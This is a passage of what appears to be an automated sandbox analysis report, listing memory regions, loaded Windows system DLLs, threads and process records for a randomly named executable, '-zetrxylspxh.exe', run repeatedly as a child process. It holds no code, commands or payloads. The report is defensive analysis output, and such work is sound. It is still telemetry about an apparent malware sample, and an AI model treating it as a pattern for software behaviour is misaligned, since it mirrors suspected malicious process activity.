0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7391 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7392 start_va = 0x660000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 7393 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 7394 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7395 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7396 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7397 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7398 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7399 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7400 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7401 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7402 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7403 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7404 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7405 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7406 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7407 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7408 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7409 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7410 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7411 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7776 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7777 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7778 start_va = 0x7a0000 end_va = 0x927fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 7779 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 243 os_tid = 0xf24 Thread: id = 275 os_tid = 0xcdc Process: id = "79" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xb7ed000" os_pid = "0x1014" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6629 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6630 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6631 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6632 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6633 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6634 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6635 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6636 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6637 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6638 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6639 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6640 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6641 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6642 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6643 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6644 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 7003 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 7004 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7005 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7006 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7007 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7008 start_va = 0x640000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 7009 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7010 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7011 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7012 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7412 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7413 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7414 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7415 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7416 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 7417 start_va = 0x830000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 7418 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7419 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7420 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7421 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7422 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7423 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7424 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7425 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7426 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7427 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7428 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7429 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7430 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7431 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7432 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7433 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7434 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7435 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7780 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7781 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7782 start_va = 0x930000 end_va = 0xab7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 7783 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 244 os_tid = 0x12a0 Thread: id = 276 os_tid = 0xf98 Process: id = "80" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xb622000" os_pid = "0x1034" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6656 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6657 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6658 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6659 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6660 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6661 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6662 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6663 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6664 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6665 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6666 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6667 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6668 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6669 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6670 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6671 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 7035 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 7036 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7037 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7038 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7039 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7040 start_va = 0x5f0000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 7041 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7042 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7043 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7044 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7045 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7046 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7047 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7048 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7049 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 7050 start_va = 0x720000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7051 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7437 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7438 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7439 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7440 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7441 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7442 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7443 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7444 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7445 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7446 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7447 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7448 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7449 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 